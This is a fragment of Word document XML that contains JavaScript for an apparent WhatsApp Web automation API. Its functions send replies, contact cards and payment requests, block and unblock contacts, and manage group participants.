          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        body: contactNumber ? vcard.replace('TEL;TYPE=WORK,VOICE:', `TEL;TYPE=WORK,VOICE;waid=${contactNumber}:`) : vcard,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaData: undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isQuotedMsgAvailable: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        subtype: contactName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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await Promise.all(Store.addAndSendMsgToChat(chat, tempMsg)))[1] == "success"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window.WAPI.reply = async function (chatId, body, quotedMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (typeof quotedMsg !== "object") quotedMsg = Store.Msg.get(quotedMsg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chat) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let extras = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (quotedMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        extras = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedParticipant: quotedMsg.author || quotedMsg.from,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedStanzaID: quotedMsg.id.id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var tempMsg = Object.create(Store.Msg.models.filter(msg =&gt; msg.__x_isSentByMe &amp;&amp; !msg.quotedMsg)[0]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        to: new Store.WidFactory.createWid(chatId),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "chat",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        quotedMsg,</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...extras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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const res = await Promise.all(await Store.addAndSendMsgToChat(chat, tempMsg));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (res[1] != 'success') return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return res[0].id._serialized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 Payment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chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} amount1000 The amount in base value / 10 (e.g 50000 in GBP = £50)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} currency Three letter currency code (e.g SAR, GBP, USD, INR, AED, EUR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} note message to send with the payment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window.WAPI.sendPaymentRequest = async function (chatId, amount1000, currency, noteMessage) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(Store.Msg.models.filter(msg =&gt; msg.__x_isSentByMe &amp;&amp; !msg.quotedMsg)[0]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</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isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "payment",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        subtype: "request",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        amount1000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        requestFrom: chatId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        currency,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        noteMessage,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expiryTimestamp: parseInt(new Date(new Date().setDate(new Date().getDate() + 1)).getTime()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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.addAndSendMsgToChat(chat, tempMsg)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 Customized VCard without the necessity of contact be a WA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@param {string} chatId '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {object|array} vcard { displayName: 'Contact Name', vcard: 'BEGIN:VCARD\nVERSION:3.0\nN:;Contact Name;;;\nEND:VCARD' } | [{ displayName: 'Contact Name 1', vcard: 'BEGIN:VCARD\nVERSION:3.0\nN:;Contact Name 1;;;\nEND:VCARD' }, { displayName: 'Contact Name 2', vcard: 'BEGIN:VCARD\nVERSION:3.0\nN:;Contact Name 2;;;\nEND:VCARD'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window.WAPI._sendVCard = function (chatId, vcard) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(Store.Msg.models.filter(msg =&gt; msg.__x_isSentByMe &amp;&amp; !msg.quotedMsg)[0]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);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var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</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isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isQuotedMsgAvailable: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if (Array.isArray(vcard)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        Object.assign(extend, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            type: "multi_vcard",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            vcardList: vcard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extend.body;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        Object.assign(extend, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            type: "vcard",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            subtype: vcard.displayName,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            body: vcard.vcard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delete extend.vcardList;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Object.assign(tempMsg, extend);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Store.addAndSendMsgToChat(chat, tempMsg)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Block contact </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} 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window.WAPI.contactBlock = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const contact = window.Store.Contact.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (contact !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await Store.Block.blockContact(contact)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Unblock contact </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} id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window.WAPI.contactUnblock = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const contact = window.Store.Contact.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (contact !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await Store.Block.unblockContact(contact)</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Remove participant of Group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idGroup '0000000000-00000000@g.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idParticipant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window.WAPI.removeParticipant = async function (idGroup, idParticipant) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = Store.Chat.get(idGroup);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const rm = chat.groupMetadata.participants.get(idParticipant);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await window.Store.Participants.removeParticipants(chat, [rm]);</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participant to Group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idGroup '0000000000-00000000@g.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {*} idParticipant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window.WAPI.addParticipant = async function (idGroup, idParticipant) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = Store.Chat.get(idGroup);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const add = Store.Contact.get(idParticipant);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await window.Store.Participants.addParticipants(chat, [add]);</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Promote Participant to Admin in Group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
